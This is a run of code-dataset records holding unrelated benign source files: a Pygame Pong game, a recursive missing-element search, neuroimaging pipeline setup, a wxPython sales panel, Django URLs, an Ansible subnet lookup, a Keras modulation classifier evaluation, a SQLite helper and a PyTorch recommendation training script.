-self.speed[0]\n\t sonido_punto.play()\n\t self.rect.centerx = SCREEN_WIDTH / 2\n\t self.rect.centery = SCREEN_HEIGHT / 2\n if self.rect.top < 0 or self.rect.bottom > SCREEN_HEIGHT:\n self.speed[1] = -self.speed[1]\"\"\"\n if self.rect.left < 0 or self.rect.right > FULLSCREEN_WIDTH:\n\t self.speed[0] = -self.speed[0]\n\t if self.rect.left < 0:\n\t marcador.punto2()\n\t self.speed[0] += 1\n\t #punto del jugador 2\n\t else:\n\t marcador.punto1()\n\t self.speed[0] += 1\n\t\t\t #punto del jugador 1\n\t sonido_punto.play()\n\t self.rect.centerx = FULLSCREEN_WIDTH / 2 - 11\n\t self.rect.centery = FULLSCREEN_HEIGHT / 2 - 11\n if self.rect.top < LINE_HEIGHT or self.rect.bottom > FULLSCREEN_HEIGHT:\n self.speed[1] = -self.speed[1]\n self.rect.move_ip((self.speed[0], self.speed[1]))\n \n def ganador(self):\n\t x = load_image(\"cup.png\", 
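# winner screen: replace the ball sprite with the trophy image, scaled to CUP_WIDTH x CUP_HEIGHT below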
IMG_DIR, True)\n\t self.image = pygame.transform.smoothscale(x, (CUP_WIDTH, CUP_HEIGHT))\n\t self.rect.centerx = (FULLSCREEN_WIDTH - CUP_WIDTH)/2\n\t self.rect.centery = (FULLSCREEN_HEIGHT - CUP_HEIGHT)/2\n \n def colision(self, objetivo, sonido_golpe=None):\n\t if self.rect.colliderect(objetivo.rect):\n\t\t self.speed[0] = -self.speed[0]\n\t\t sonido_golpe.play()\n\nclass Marcador():\n\tdef __init__(self):\n\t\tself.jugador1 = 0\n\t\tself.jugador2 = 0\n\t\tself.ganador = 0\n\t\n\tdef punto1(self):\n\t\tself.jugador1 += 1\n\t\tif (self.jugador1 > SCORE_LIMIT-1):\n\t\t\tself.ganador = 1\n\t\t\t#El jugador 1 ganó\n\t\n\tdef punto2(self):\n\t\tself.jugador2 += 1\n\t\tif (self.jugador2 > SCORE_LIMIT-1):\n\t\t\tself.ganador = 2\n\t\t\t#El jugador 2 ganó\n\t\t\t\nclass Paleta(pygame.sprite.Sprite):\n \"Define el comportamiento de las paletas de ambos jugadores\"\n \n def __init__(self, x, type=1):\n\t pygame.sprite.Sprite.__init__(self)\n\t if (type == 1):\n\t self.image = load_image(\"paddle1.png\", IMG_DIR, True)\n\t else:\n\t self.image = load_image(\"paddle2.png\", IMG_DIR, True)\n\t self.rect = self.image.get_rect()\n\t self.rect.centerx = x\n\t \"\"\"self.rect.centery = SCREEN_HEIGHT/2\"\"\"\n\t self.rect.centery = FULLSCREEN_HEIGHT/2\n\n def humano(self):\n\t # control de que la paleta no salga de la pantalla\n \"\"\"if self.rect.bottom >= SCREEN_HEIGHT:\n\t self.rect.bottom = SCREEN_HEIGHT\"\"\"\n if self.rect.bottom >= FULLSCREEN_HEIGHT:\n\t self.rect.bottom = FULLSCREEN_HEIGHT\n elif self.rect.top <= LINE_HEIGHT:\n self.rect.top = LINE_HEIGHT\n \n def cpu(self, pelota):\n\t self.speed = [0, 3]\n\t #if pelota.speed[0] >= 0 and pelota.rect.centerx >= SCREEN_WIDTH / 2:\n\t if pelota.speed[0] >= 0 and pelota.rect.centerx >= FULLSCREEN_WIDTH / 2:\n\t if (self.rect.centery > pelota.rect.centery) and (self.rect.centery < (FULLSCREEN_HEIGHT - self.speed[1])) :\n\t self.rect.centery -= self.speed[1]\n\t if self.rect.centery < pelota.rect.centery and (self.rect.centery > (self.speed[1])):\n\t self.rect.centery += self.speed[1]\n\t\t \n# ----------------------------------------------\n# Funcion principal del juego\n# ----------------------------------------------\n\ndef main(): \n # creamos la ventana y le indicamos un titulo:\n #screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n screen = pygame.display.set_mode((FULLSCREEN_WIDTH, FULLSCREEN_HEIGHT), FULLSCREEN)\n #screen = pygame.display.set_mode((1500, 780), pygame.FULLSCREEN)\n \n icon = load_image(\"pong_icon.png\", IMG_DIR, True)\n pygame.display.set_icon(icon)\n \n pygame.display.set_caption(\"Pong - Command control\")\n \n fuente = pygame.font.Font(None, 45)\n \n # se cargan los objetos\n fondo = load_image(\"blackParquet.jpg\", IMG_DIR)\n #fondo = pygame.transform.scale(f, (FULLSCREEN_WIDTH, FULLSCREEN_HEIGHT))\n bola = Pelota()\n marcador = Marcador()\n jugador1 = Paleta(25, type=1)\n #jugador2 = Paleta(SCREEN_WIDTH - 25)\n jugador2 = Paleta(FULLSCREEN_WIDTH - 25, type=2)\n sonido_golpe = load_sound(\"tennis.ogg\", SND_DIR)\n sonido_punto = load_sound(\"aplausos.ogg\", SND_DIR)\n \n clock = pygame.time.Clock()\n pygame.key.set_repeat(1, 25) # Activa repeticion de teclas\n pygame.mouse.set_visible(False)\n \n # el bucle principal del juego\n while True:\n\t clock.tick(60)\n\t pos_mouse = pygame.mouse.get_pos()\n\t mov_mouse = pygame.mouse.get_rel()\n\t \n\t jugador1.humano()\n\t jugador2.cpu(bola)\n\t bola.update(marcador, sonido_punto)\n\t \n\t bola.colision(jugador1,sonido_golpe)\n\t 
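# same collision test for player 2; colision() reverses the ball's x-speed and plays the hit sound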
bola.colision(jugador2,sonido_golpe)\n\n\t for event in pygame.event.get():\n\t if event.type == pygame.QUIT:\n\t\t sys.exit(0)\n\t elif event.type == pygame.KEYDOWN:\n\t\t if event.key == K_w:\n\t\t\t jugador1.rect.centery -= 6\n\t\t elif event.key == K_s:\n\t\t jugador1.rect.centery += 6\n\t\t elif event.key == K_ESCAPE:\n\t\t\t sys.exit(0)\n\t #elif mov_mouse[1] != 0:\n\t\t #jugador1.rect.centery = pos_mouse[1]\n \n # update the screen\n\t if marcador.ganador != 0:\n\t\t texto = \"Ganador: jugador %d\" % (marcador.ganador)\n\t\t desp = 135\n\t\t bola.ganador()\n\t else:\n\t texto = \"%d | %d\" % (marcador.jugador1, marcador.jugador2)\n\t desp = 42\n\t \n\t mensaje = fuente.render(texto, 1, (255, 255, 255))\n\t \n\t #pygame.draw.aaline(fondo, (191, 191, 191), (0, LINE_HEIGHT), (FULLSCREEN_WIDTH, LINE_HEIGHT))\n\t pygame.draw.line(fondo, (191, 191, 191), (0, LINE_HEIGHT), (FULLSCREEN_WIDTH, LINE_HEIGHT), 4)\n\t screen.blit(fondo, (0,0))\n\t screen.blit(mensaje, (FULLSCREEN_WIDTH/2 - desp, 10))\n\t screen.blit(bola.image, bola.rect)\n\t screen.blit(jugador1.image, jugador1.rect)\n\t screen.blit(jugador2.image, jugador2.rect)\n\t pygame.display.flip()\n\t \n\t if marcador.ganador != 0:\n\t while True:\n\t for event in pygame.event.get():\n\t if event.type == pygame.QUIT:\n\t\t sys.exit(0)\n\t elif event.type == pygame.KEYDOWN:\n\t if event.key == K_ESCAPE:\n\t sys.exit(0)\n\nif __name__ == \"__main__\":\n pygame.init()\n main()\n","sub_path":"Demo 1 - py/pong_lfs.py","file_name":"pong_lfs.py","file_ext":"py","file_size_in_byte":8300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"469077929","text":"#\r\n# def findmissingElement(arr) :\r\n# n = len(arr)\r\n# n1 = [0] * (n+1)\r\n# d = 2\r\n# for i in range(len(n1)):\r\n# n1[i] = d * i\r\n#\r\n# for i in range(len(n1)):\r\n# if n1[i] not in arr:\r\n# print(n1[i])\r\n\r\n# Order of N Solution\r\n# def findmissingElement(arr):\r\n# d = 2\r\n# for i in range(len(arr)):\r\n# if arr[i] != arr[0] + d * i:\r\n# return arr[0] + d * i\r\n\r\narr = [0,2,4,6,10,12,14]\r\n\r\ndef findmissingElement(A,min,max ,d):\r\n\r\n if min > max:\r\n raise ValueError(\"min cannot be greater than max\")\r\n mid = (min + max) // 2\r\n\r\n if min == max and A[min] != A[0] + d * min:\r\n return A[0] + d * min\r\n\r\n if A[mid] == A[0] + d * mid:\r\n min = mid +1\r\n else:\r\n max = mid - 1\r\n\r\n return findmissingElement(A,min,max,d)\r\n\r\nprint(findmissingElement(arr,0,len(arr)-1,2))","sub_path":"DivideAndConquer/FindMissingElementInAP.py","file_name":"FindMissingElementInAP.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"458848694","text":"\"\"\"\nBuilds, validates, and executes parameters for the HCP script \n/opt/HCP-Pipelines/PostFreeSurfer/PostFreeSurferPipeline.sh\npart of the hcp-struct gear\n\"\"\"\nimport os\nimport os.path as op\nimport subprocess as sp\n\nfrom collections import OrderedDict\n\nfrom .common import build_command_list, exec_command\n\n\ndef build(context):\n config = context.config\n environ = context.gear_dict[\"environ\"]\n # Some options that may become user-specified in the future,\n # but use standard HCP values for now\n # Usually 2mm (\"1.6\" also available)\n config[\"GrayordinatesResolution\"] = \"2\"\n # Usually 32k vertices (\"59\" = 1.6mm)\n config[\"LowResMesh\"] = \"32\"\n # (or 170494_Greyordinates = 1.6mm)\n config[\"GrayordinatesTemplate\"] = \"91282_Greyordinates\"\n # 
Basically always 164k vertices\n config[\"HighResMesh\"] = \"164\"\n\n params = OrderedDict()\n params[\"path\"] = context.work_dir\n params[\"subject\"] = config[\"Subject\"]\n # (Need to rename make surf.gii and add 32k)\n params[\"surfatlasdir\"] = op.join(\n environ[\"HCPPIPEDIR_Templates\"], \"standard_mesh_atlases\"\n )\n # (Need to copy these in)$GrayordinatesSpaceDIR\n params[\"grayordinatesdir\"] = op.join(\n environ[\"HCPPIPEDIR_Templates\"], config[\"GrayordinatesTemplate\"]\n )\n params[\"grayordinatesres\"] = config[\"GrayordinatesResolution\"]\n params[\"hiresmesh\"] = config[\"HighResMesh\"]\n params[\"lowresmesh\"] = config[\"LowResMesh\"]\n params[\"subcortgraylabels\"] = op.join(\n environ[\"HCPPIPEDIR_Config\"], \"FreeSurferSubcorticalLabelTableLut.txt\"\n )\n params[\"freesurferlabels\"] = op.join(\n environ[\"HCPPIPEDIR_Config\"], \"FreeSurferAllLut.txt\"\n )\n params[\"refmyelinmaps\"] = op.join(\n environ[\"HCPPIPEDIR_Templates\"],\n \"standard_mesh_atlases\",\n \"Conte69.MyelinMap_BC.164k_fs_LR.dscalar.nii\",\n )\n # Needs Checking for being FS or MSMSulc otherwise Error.\n params[\"regname\"] = config[\"RegName\"]\n params[\"printcom\"] = \" \"\n # Unaccounted for parameters:\n # CorrectionSigma=`opts_GetOpt1 \"--mcsigma\" $@` DEFAULT: sqrt(200)\n # InflateExtraScale=`opts_GetOpt1 \"--inflatescale\" $@`f DEFAULT: 1\n context.gear_dict[\"POST-params\"] = params\n\n\ndef validate(context):\n params = context.gear_dict[\"POST-params\"]\n if not (params[\"regname\"] in [\"FS\", \"MSMSulc\"]):\n raise Exception('RegName must be \"FS\" or \"MSMSulc\"!')\n\n\ndef execute(context):\n environ = context.gear_dict[\"environ\"]\n command = []\n command.extend(context.gear_dict[\"command_common\"])\n command.append(\n op.join(environ[\"HCPPIPEDIR\"], \"PostFreeSurfer\", \"PostFreeSurferPipeline.sh\")\n )\n command = build_command_list(command, context.gear_dict[\"POST-params\"])\n\n stdout_msg = (\n \"PostFreeSurfer logs (stdout, stderr) will be available \"\n + 'in the file \"pipeline_logs.zip\" upon completion.'\n )\n\n context.log.info(\"PostFreeSurfer command: \\n\")\n exec_command(context, command, stdout_msg=stdout_msg)\n","sub_path":"utils/args/PostFreeSurfer.py","file_name":"PostFreeSurfer.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"179145443","text":"from terminalFrontEnd import terminalPanel\nimport newCust as nc\nimport wx\n\n\nclass cashSalePanel(terminalPanel):\n def __init__(self, parent, transactionButtonName, uid):\n terminalPanel.__init__(self, parent, transactionButtonName, uid)\n\n def CheckOutFunc(self, event):\n if len(self.t.cart.products) == 0:\n return\n\n amt = self.makePopUp(\"Enter Recieved Amount\", \"Amount Recieved\")\n if amt == \"\":\n return\n while amt.isdigit() is False:\n amt = self.makePopUp(\"Enter Recieved Amount (only digits)\", \"Amount Recieved\")\n print(amt)\n\n isprinter = self.t.checkout(int(amt))\n if isprinter is None:\n x = wx.MessageDialog(self, \"Printer not connected\", \"No Printer\", wx.OK)\n x.ShowModal()\n else:\n self.clearCartGrid()\n\n\ndef refundFunc(self, event):\n self.clearCartGrid()\n self.t.returnProducts() # self.m_balanceST.SetFocus()\n","sub_path":"hh/salesPanel.py","file_name":"salesPanel.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"73108127","text":"from django.urls import path, include\nfrom core 
import views\n\n\napp_name = 'core'\n\nurlpatterns = [\n path('process-list-full/', views.ProcessList, name='process-list'),\n # path('process-list-partner', ProcessListPartner.as_view(), name='process-list-partner'),\n # path('process-list-owner', ProcessListOwner.as_view(), name='process-list-owner'),\n path('process-create/', views.ProcessCreate, name='create'),\n # path('process-detail/', ProcessDetail.as_view(), name='process-detail'),\n path('process-update/', views.ProcessUpdate, name='process-update'),\n path('process-delete/', views.ProcessDelete, name='process-delete'),\n\n\n]","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"262714208","text":"#!/usr/bin/env python\n\nfrom ansible import errors\nfrom netaddr import IPNetwork\n\ntry:\n # ansible-2.0\n from ansible.plugins.lookup import LookupBase\nexcept ImportError:\n # ansible-1.9.x\n class LookupBase(object):\n def __init__(self, basedir=None, runner=None, **kwargs):\n self.runner = runner\n self.basedir = self.runner.basedir\n def get_basedir(self, variables):\n return self.basedir\n\n\nclass LookupModule(LookupBase):\n def __init__(self, basedir=None, **kwargs):\n self.basedir = basedir\n\n def run(self, args, inject=None, **kwargs):\n try:\n domain_cidr=list(args)[0][0]['domain_cidr']\n site_cidr=list(args)[0][1]['site_cidr']\n vpc=list(args)[0][2]['vpc']\n vpc_subnet_azs=list(args)[0][3]['vpc_subnet_azs']\n\n ip = IPNetwork(vpc['vpcs'][0]['cidr_block'])\n subnets = list(ip.subnet(26))\n\n for az in vpc_subnet_azs:\n if len(domain_cidr) < 3:\n if az not in str(domain_cidr):\n for ip in subnets:\n if str(ip) not in str(domain_cidr):\n if str(ip) not in str(site_cidr):\n if int(str(ip).split('.')[2]) > 9:\n if int(str(ip).split('.')[2]) != 111:\n a={}\n a['az'] = az\n a['cidr_block'] = str(ip)\n domain_cidr.append(a)\n break\n if len(domain_cidr) == 3:\n return domain_cidr\n else:\n raise Exception('Error in available subnets: Most likely 3 cidr ranges are not available')\n except Exception as e:\n raise errors.AnsibleError(\"Error: %s\" % (e))","sub_path":"reference-architecture/aws-ansible/playbooks/lookup_plugins/subnet_next_avail_cidr.py","file_name":"subnet_next_avail_cidr.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396652206","text":"\"\"\"\nThis function trains and evaluates a model from RFML\n\nRequires: Python 3.5\nLast modified: 9/13/2017\nLast modified by: Boston Clark Terry\n\"\"\"\n\nimport os, random\nos.environ[\"KERAS_BACKEND\"] = \"tensorflow\"\nos.environ[\"THEANO_FLAGS\"] = \"device=gpu%d\"%(1)\nimport numpy as np\nfrom keras.utils import np_utils\nimport keras.models as models\nfrom keras.layers.core import Reshape,Dense,Dropout,Activation,Flatten\nfrom keras.layers.noise import GaussianNoise\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D, ZeroPadding2D\nfrom keras.regularizers import *\nfrom keras.optimizers import adam\nimport matplotlib.pyplot as plt\nimport pickle\nimport random, sys, keras\nimport pdb\n\n# opens and analyzes a file given as a parameter\nif (len(sys.argv) < 2):\n\tprint (\"needs more args - arg1: data sample to run\")\ndata_file = sys.argv[1]\n\n# Load the file ...\nXd = pickle.load(open(data_file,'rb'),encoding='latin1') # latin encoding used for python3 support\n\n# Extract the labels\nsnrs,mods = map(lambda j: 
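# j=1 pulls the unique SNRs and j=0 the unique modulation names out of the (mod, snr) keys, both sorted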
sorted(list(set(map(lambda x: x[j], Xd.keys())))), [1,0])\n # snrs: [-20, -18, -16, -14, -12, -10, -8, -6, -4, -2, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18]\n # mods: ['8PSK', 'AM-DSB', 'AM-SSB', 'BPSK', 'CPFSK', 'GFSK', 'PAM4', 'QAM16', 'QAM64', 'QPSK', 'WBFM']\n\n \n \nX = [] \nlbl = []\nfor mod in mods:\n for snr in snrs:\n X.append(Xd[(mod,snr)])\n for i in range(Xd[(mod,snr)].shape[0]): lbl.append((mod,snr))\n print(str(mod))\nX = np.vstack(X)\n\nn_examples = X.shape[0] \ntest_idx = list(set(range(0,n_examples)))\nX_test = X[test_idx]\n\n# map the labels to outputs\ndef to_onehot(yy):\n\tyy_list = list(yy)\n\tyy1 = np.zeros([len(yy_list), max(yy_list)+1]) # np.zeros(2,1) -> array([[0.0], 0.0]])\n\tyy1[np.arange(len(yy_list)), yy_list] = 1\n\treturn yy1\n\nY_test = to_onehot(map(lambda x: mods.index(lbl[x][0]), test_idx))\n\t\n# set the input shape [2,1024]\nin_shp = list(X_test.shape[1:])\nprint (X_test.shape, in_shp) # (110000, 2, 1024) [2, 1024]\nclasses = ['BPSK', '8PSK', 'QPSK', 'PAM4', 'QAM16', 'QAM64', 'GFSK', 'CPFSK', 'WBFM', 'AM-DSB', 'AM-SSB']\n# all_keys = {\"bpsk\":0,\"8psk\":0, \"qpsk\":0, \"pam4\":0, \"qam16\":0, \"qam64\":0, \"gfsk\":0, \"cpfsk\":0, \"fm\": 1, \"am\": 1, \"amssb\": 1 }\n\n# Build VT-CNN2 Neural Net model using Keras primitives -- \n# - Reshape [N,2,1024] to [N,1,2,1024] on input\n# - Pass through 2 2DConv/ReLu layers\n# - Pass through 2 Dense layers (ReLu and Softmax)\n# - Perform categorical cross entropy optimization\n\ndr = 0.5 # dropout rate (%)\nmodel = models.Sequential()\nmodel.add(Reshape([1]+in_shp, input_shape=in_shp))\nmodel.add(ZeroPadding2D((0, 2), data_format=\"channels_first\"))\nmodel.add(Convolution2D(256, (1, 3), activation=\"relu\", name=\"conv1\", data_format=\"channels_first\"))\nmodel.add(Dropout(dr))\nmodel.add(ZeroPadding2D((0, 2), data_format=\"channels_first\"))\nmodel.add(Convolution2D(80, (2, 3), activation=\"relu\", name=\"conv2\", data_format=\"channels_first\"))\nmodel.add(Dropout(dr))\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='relu', kernel_initializer='he_normal', name=\"dense1\"))\nmodel.add(Dropout(dr))\nmodel.add(Dense( len(classes), kernel_initializer='he_normal', name=\"dense2\" ))\nmodel.add(Activation('softmax'))\nmodel.add(Reshape([len(classes)]))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')\nmodel.summary()\n\n# Set up some params \nbatch_size = 256\n\n# open the previously trained model\nfilepath = 'convmodrecnets_CNN2_0.5.wts.h5'\nmodel.load_weights(filepath)\n\n# returns an array of predictions\ny_hat = model.predict(X_test, batch_size=256)\nprint(y_hat)\nprint(y_hat.shape)\n\ndef plot_confusion_matrix(cm, title='Confusion matrix', cmap=plt.cm.Blues, labels=[]):\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(labels))\n plt.xticks(tick_marks, labels, rotation=45)\n plt.yticks(tick_marks, labels)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n# plot the confusion matrix\t\nconf = np.zeros([len(classes),len(classes)]) # conf: [11x11]\nconfnorm = np.zeros([len(classes),len(classes)]) # confnorm: [11x11]\n\nfor i in range(0,X_test.shape[0]):\n j = list(Y_test[i,:]).index(1)\n k = int(np.argmax(y_hat[i,:]))\n conf[j,k] = conf[j,k] + 1 # increment each time\n\nfor i in range(0,len(classes)):\n confnorm[i,:] = conf[i,:] / np.sum(conf[i,:])\n\nplt.figure()\nplot_confusion_matrix(confnorm, labels=classes) \nplt.show()\n\n# # These errors are probably from trying to divide by zero or 
NaN\n# # example_training.py:208: RuntimeWarning: invalid value encountered in true_divide\n# # confnorm[i,:] = conf[i,:] / np.sum(conf[i,:])\n\n# # example_training.py:214: RuntimeWarning: invalid value encountered in double_scalars\n# # print (\"Overall Accuracy: \", cor / (cor+ncor))\n\n# # Overall Accuracy: nan\n\n# # example_training.py:215: RuntimeWarning: invalid value encountered in double_scalars\n# # acc[snr] = 1.0*cor/(cor+ncor)\n\n# # just in case we picked up some NaNs\n# np.nan_to_num(confnorm)\n\n# # Plot confusion matrix\n# acc = {}\n# for snr in snrs:\n\n # # extract classes @ SNR\n # test_SNRs = list(map(lambda x: lbl[x][1], test_idx))\n # test_X_i = X_test[np.where(np.array(test_SNRs)==snr)]\n # test_Y_i = Y_test[np.where(np.array(test_SNRs)==snr)] \n\n # # estimate classes\n # test_Y_i_hat = model.predict(test_X_i)\n # conf = np.zeros([len(classes),len(classes)])\n # confnorm = np.zeros([len(classes),len(classes)])\n\n # for i in range(0,test_X_i.shape[0]):\n # j = list(test_Y_i[i,:]).index(1)\n # k = int(np.argmax(test_Y_i_hat[i,:]))\n # conf[j,k] = conf[j,k] + 1\n\n # for i in range(0,len(classes)):\n # confnorm[i,:] = conf[i,:] / np.sum(conf[i,:])\n \n # np.nan_to_num(confnorm)\n \n # plt.figure()\n # plot_confusion_matrix(confnorm, labels=classes, title=\"ConvNet Confusion Matrix (SNR=%d)\"%(snr))\n \n # cor = np.sum(np.diag(conf))\n # ncor = np.sum(conf) - cor\n # print (\"Overall Accuracy: \", cor / (cor+ncor))\n # acc[snr] = 1.0*cor/(cor+ncor)\n \n # # Save results to a pickle file for plotting later\n# print (acc)\n# fd = open('results_cnn2_d0.5.dat','wb')\n# pickle.dump( (\"CNN2\", 0.5, acc) , fd )\n\n \n\n# # Plot accuracy curve\n# plt.figure()\n# plt.plot(snrs, list(map(lambda x: acc[x], snrs)))\n# plt.xlabel(\"Signal to Noise Ratio\")\n# plt.ylabel(\"Classification Accuracy\")\n# plt.title(\"CNN2 Classification Accuracy on RadioML 2016.10 Alpha\")\n# plt.show()\n\n\n","sub_path":"python27/load_net_and_run_sample.py","file_name":"load_net_and_run_sample.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"6753222","text":"import sqlite3\n\nimport database.factory\n\ndef load_privatentnahmen(sqlite_file):\n\n conn = sqlite3.connect(sqlite_file)\n conn.row_factory = database.factory.dict_factory\n c = conn.cursor()\n\n c.execute(\"SELECT oid, * FROM privatentnahmen ORDER BY datum DESC\")\n privatentnahmen = c.fetchall()\n\n conn.close()\n\n return privatentnahmen\n\ndef save_privatentnahmen(sqlite_file, pe):\n\n conn = sqlite3.connect(sqlite_file)\n c = conn.cursor()\n\n eurkonto = 0\n\n if(pe['typ'] == '0'):\n eurkonto = 108 #: Sonstige Sach-, Nutzungs- und Leistungsentnahmen\n else:\n eurkonto = 164 #: Geschenke\n\n c.execute(\"INSERT INTO privatentnahmen (datum, artikel_id, anzahl, typ, eurkonto) VALUES(?, ?, ?, ?, ?)\", [ pe['datum'], pe['artikel_id'], pe['anzahl'], pe['typ'], eurkonto ] )\n\n conn.commit()\n conn.close()\n","sub_path":"database/privatentnahmen.py","file_name":"privatentnahmen.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"132848083","text":"import os\nimport sys\nimport json\nimport time\nimport torch\nimport pickle\nimport argparse\nimport numpy as np\nfrom torch import nn\nfrom loader.logger import Tee\nfrom collections import OrderedDict\nfrom model.RNN_torch import Recommend\nfrom sklearn.metrics import accuracy_score, 
mean_squared_error\nfrom loader.utils import create_recommend\nfrom loader.data_loader import load_recommend\nfrom loader.dataset import Recommend_Dataset, Recommend_Processor\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"--word_dim\", default=\"128\",\n type=int, help=\"Token embedding dimension\"\n)\nparser.add_argument(\n \"--feature_dim\", default=\"4\",\n type=int, help=\"Feature embedding dimension\"\n)\nparser.add_argument(\n \"--hidden_dim\", default=\"64\",\n type=int, help=\"Hidden dimension\"\n)\nparser.add_argument(\n \"--model_dp\", default=\"models/recommend_models/\",\n help=\"model directory path\"\n)\nparser.add_argument(\n \"--gpu\", default=\"1\",\n type=int, help=\"default is 1. set 0 to disable use gpu.\"\n)\nparser.add_argument(\n \"--batch_size\", default=\"32\",\n type=int, help=\"Batch size.\"\n)\nparser.add_argument(\n \"--dropout\", default=\"0.4\",\n type=float, help=\"Dropout on the embeddings (0 = no dropout)\"\n)\nparser.add_argument(\n \"--layer_dropout\", default=\"0.2\",\n type=float, help=\"Dropout on the embeddings (0 = no dropout)\"\n)\nparser.add_argument(\n \"--max_len\", default=\"200\",\n type=int, help=\"Max length.\"\n)\nparser.add_argument(\n \"--freq\", default=\"1\",\n type=int, help=\"Min freq.\"\n)\nparser.add_argument(\n \"--lr_rate\", default=\"0.0001\",\n type=float, help=\"Learning rate\"\n)\nparser.add_argument(\n \"--data_path\", default=\"data\",\n help=\"data directory path\"\n)\nparser.add_argument(\n \"--load\", action='store_true', help=\"Load dataset.\"\n)\nparser.add_argument(\n \"--num_epochs\", default=\"80\",\n type=int, help=\"Number of training epochs\"\n) \nparser.add_argument(\n \"--model\", default=\"best_dev_model.pth.tar\",\n help=\"Model location\"\n)\nargs = parser.parse_args()\n\nparameters = OrderedDict()\nparameters['freq'] = args.freq\nparameters['w_dim'] = args.word_dim\nparameters['f_dim'] = args.feature_dim\nparameters['h_dim'] = args.hidden_dim\nparameters['input_dropout'] = args.dropout\nparameters['layer_dropout'] = args.layer_dropout\nparameters['gpu'] = args.gpu == 1\nparameters['batch_size'] = args.batch_size\nparameters['max_len'] = args.max_len\nparameters['lr_rate'] = args.lr_rate\n\nparameters['data'] = 'acl_2017'\nmodel_dir = args.model_dp\nmodel_name = ['RNN']\nmodel_dir = args.model_dp\nfor k, v in parameters.items():\n if v == \"\":\n continue\n if k == 'pre_emb':\n v = os.path.basename(v)\n model_name.append('='.join((k, str(v))))\nmodel_dir = os.path.join(model_dir, parameters['data'] +','.join(model_name[:-1]))\nos.makedirs(model_dir, exist_ok=True)\n\n\nparameters['num_class'] = 5\n\ntraining_log_path = os.path.join(model_dir, 'training_log.txt')\nif os.path.exists(training_log_path):\n os.remove(training_log_path)\nf = open(training_log_path, 'w')\nsys.stdout = Tee(sys.stdout, f)\n\n\nif args.load:\n state = pickle.load(open(args.data_path + '/recommend_dataset.pth', 'rb'))\n mappings = state['mappings']\n r_dataset = state['r_dataset']\n v_dataset = state['v_dataset']\n t_dataset = state['t_dataset']\nelse:\n words, r_dataset = load_recommend(parameters['data'] + '/RECOMMENDATION_train.json', True)\n mappings = create_recommend(words, parameters['freq'])\n v_dataset = load_recommend(parameters['data'] + '/RECOMMENDATION_valid.json')\n t_dataset = load_recommend(parameters['data'] + '/RECOMMENDATION_test.json')\n state = {\n 'mappings': mappings,\n 'r_dataset': r_dataset,\n 'v_dataset': v_dataset,\n 't_dataset': t_dataset\n }\n pickle.dump(state, open(args.data_path + 
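# cache the mappings and dataset splits so later runs can skip preprocessing via --load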
'/recommend_dataset.pth', \"wb\"))\n\nword2id = mappings['word2id']\nid2word = mappings['id2word']\nvocab_size = len(mappings['id2word'])\n\nfa1_bins = mappings['fa1']\nfa1_size = len(fa1_bins) + 1\n\nfa2_bins = mappings['fa2']\nfa2_size = len(fa2_bins) + 1\n\nfr1_bins = mappings['fr1']\nfr1_size = len(fr1_bins) + 1\n\nfr2_bins = mappings['fr2']\nfr2_size = len(fr2_bins) + 1\n\nfs1_bins = mappings['fs1']\nfs1_size = len(fs1_bins) + 1\n\nfs2_bins = mappings['fs2']\nfs2_size = len(fs2_bins) + 1\n\nfn1_bins = mappings['fn1']\nfn1_size = len(fn1_bins) + 1\n\nfn2_bins = mappings['fn2']\nfn2_size = len(fn2_bins) + 1\n\nfi1_bins = mappings['fi1']\nfi1_size = len(fi1_bins) + 1\n\n\ndevice = torch.device(\"cuda:1\" if torch.cuda.is_available() and parameters['gpu'] else \"cpu\")\n\ntrain_dataset = Recommend_Dataset(r_dataset, word2id, fa1_bins, fa2_bins, fs1_bins, fs2_bins, fn1_bins, fn2_bins, fr1_bins, fr2_bins, fi1_bins, parameters['max_len'])\nvalid_dataset = Recommend_Dataset(v_dataset, word2id, fa1_bins, fa2_bins, fs1_bins, fs2_bins, fn1_bins, fn2_bins, fr1_bins, fr2_bins, fi1_bins, parameters['max_len'])\ntest_dataset = Recommend_Dataset(t_dataset, word2id, fa1_bins, fa2_bins, fs1_bins, fs2_bins, fn1_bins, fn2_bins, fr1_bins, fr2_bins, fi1_bins, parameters['max_len'])\n\napro_proc = Recommend_Processor()\n\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=args.batch_size,\n shuffle=True,\n num_workers=2,\n pin_memory=False,\n collate_fn=apro_proc.process\n)\n\nval_loader = torch.utils.data.DataLoader(\n valid_dataset,\n batch_size=args.batch_size,\n shuffle=True,\n num_workers=2,\n pin_memory=False,\n collate_fn=apro_proc.process\n)\n\ntest_loader = torch.utils.data.DataLoader(\n test_dataset,\n batch_size=args.batch_size,\n shuffle=True,\n num_workers=2,\n pin_memory=False,\n collate_fn=apro_proc.process\n)\n\nembed_layer_word = nn.Embedding(vocab_size, args.word_dim, padding_idx=0, sparse=False)\nembed_layer_fa1 = nn.Embedding(fa1_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fa2 = 